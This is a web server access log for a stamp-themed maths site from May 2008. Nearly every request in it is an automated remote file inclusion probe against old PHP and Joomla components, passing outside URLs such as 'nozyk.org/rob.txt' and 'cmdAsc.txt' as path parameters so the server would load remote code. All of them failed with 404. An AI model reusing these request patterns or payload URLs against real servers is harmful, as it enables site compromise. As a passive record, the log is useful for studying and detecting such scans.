84.234.255.250 - - [25/May/2008:22:59:28 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
84.234.255.250 - - [25/May/2008:22:59:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
84.234.255.250 - - [25/May/2008:22:59:31 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
84.234.255.250 - - [25/May/2008:22:59:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
84.234.255.250 - - [25/May/2008:22:59:32 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:22:59:51 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:00:05 -0700] "GET /components/com_jcs/view/add.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:00:05 -0700] "GET /logs/components/com_jcs/view/add.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:00:52 -0700] "GET /components/com_jcs/view/add.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:00:52 -0700] "GET /logs/components/com_jcs/view/add.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:01:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:01:05 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.79.246.200 - - [25/May/2008:23:01:25 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
77.79.246.200 - - [25/May/2008:23:01:25 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:02:26 -0700] "GET /convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:02:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:02:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:02:53 -0700] "GET /logs//include.php?path[docroot]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:02:54 -0700] "GET //include.php?path[docroot]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:02:58 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:02:58 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:03:03 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:23:03:04 -0700] "GET /convert/mvcw.php?vwar_root=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:03:33 -0700] "GET /logs//include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:03:33 -0700] "GET //include.php?path[docroot]=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:04:43 -0700] "GET /logs//include.php?path[docroot]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:04:44 -0700] "GET //include.php?path[docroot]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:04:56 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:04:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:05:08 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:05:08 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:23:05:08 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:23:05:29 -0700] "GET /logs/access_080428.log/!scanhttp://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:15 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:15 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:20 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:20 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:40 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:07:41 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:08:24 -0700] "GET /components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
85.214.72.189 - - [25/May/2008:23:08:24 -0700] "GET /logs/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:08:30 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:08:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:08:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:09:15 -0700] "GET /components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
64.38.4.3 - - [25/May/2008:23:09:15 -0700] "GET /logs/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:10:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:10:32 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:10:47 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:10:48 -0700] "GET /convert/mvcw.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:11:10 -0700] "GET /logs//include.php?path[docroot]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:11:10 -0700] "GET //include.php?path[docroot]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:11:36 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:11:36 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:11:37 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:12:14 -0700] "GET /logs/access_080407.log/convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:12:15 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:12:24 -0700] "GET /logs/access_080428.log/convert/mvcw.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.189.33 - - [25/May/2008:23:13:38 -0700] "GET /logs/access_080421.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:14:50 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:14:51 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.18.30 - - [25/May/2008:23:18:03 -0700] "GET /logs/access_070716.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:18:59 -0700] "GET /convert/mvcw.php?vwar_root=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:20:31 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:20:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
204.253.132.40 - - [25/May/2008:23:20:53 -0700] "GET /logs/access_080414.log//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
204.253.132.40 - - [25/May/2008:23:20:53 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
204.253.132.40 - - [25/May/2008:23:20:54 -0700] "GET /logs//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:21:57 -0700] "GET /logs/access_080414.log//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:21:57 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:21:57 -0700] "GET /logs//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.225.214.96 - - [25/May/2008:23:23:36 -0700] "GET /logs/access_080414.log//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.225.214.96 - - [25/May/2008:23:23:36 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:24:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:26:25 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:26:25 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.224.34.28 - - [25/May/2008:23:27:18 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sofistar.net/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.224.34.28 - - [25/May/2008:23:27:18 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sofistar.net/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.224.34.28 - - [25/May/2008:23:27:19 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sofistar.net/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:28:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:28:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:28:53 -0700] "GET /logs//include.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:28:54 -0700] "GET //include.php?path[docroot]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.214.96 - - [25/May/2008:23:29:57 -0700] "GET /logs/access_080421.log//index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.225.214.96 - - [25/May/2008:23:29:58 -0700] "GET //index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.225.214.96 - - [25/May/2008:23:29:58 -0700] "GET /logs//index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
74.55.113.226 - - [25/May/2008:23:30:31 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.113.226 - - [25/May/2008:23:30:31 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.113.226 - - [25/May/2008:23:30:31 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:31:00 -0700] "GET /logs/access_080317.log/nav.php?g=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:31:00 -0700] "GET /nav.php?g=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.16.242.144 - - [25/May/2008:23:31:00 -0700] "GET /logs/nav.php?g=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:23:31:21 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:23:31:21 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:23:31:21 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:23:31:24 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:23:31:24 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:23:31:25 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:23:31:40 -0700] "GET /logs/access_080407.log//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:23:31:41 -0700] "GET //appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:23:31:41 -0700] "GET /logs//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:31:43 -0700] "GET /logs/access_080317.log/nav.php?g=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:31:43 -0700] "GET /nav.php?g=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:23:31:44 -0700] "GET /logs/nav.php?g=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:23:31:55 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:23:32:01 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.224.34.28 - - [25/May/2008:23:32:03 -0700] "GET /logs/access_080428.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sofistar.net/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
212.241.251.88 - - [25/May/2008:23:32:55 -0700] "GET /logs/access_080428.log//appserv/main.php?appserv_root=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:33:06 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:33:20 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.251.172 - - [25/May/2008:23:34:21 -0700] "GET /nav.php?g=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.18.225 - - [25/May/2008:23:34:52 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:23:37:03 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
211.51.62.221 - - [25/May/2008:23:43:11 -0700] "GET /logs/access_080414.log//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
211.51.62.221 - - [25/May/2008:23:43:12 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
211.51.62.221 - - [25/May/2008:23:43:12 -0700] "GET /logs//main.php?x=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:43:29 -0700] "GET /logs/access_080421.log//index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:43:29 -0700] "GET //index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
203.22.204.188 - - [25/May/2008:23:43:29 -0700] "GET /logs//index.php?pagina=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:23:49:11 -0700] "GET /logs/access_080414.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:53:31 -0700] "GET /logs/access_080407.log/convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:23:53:37 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
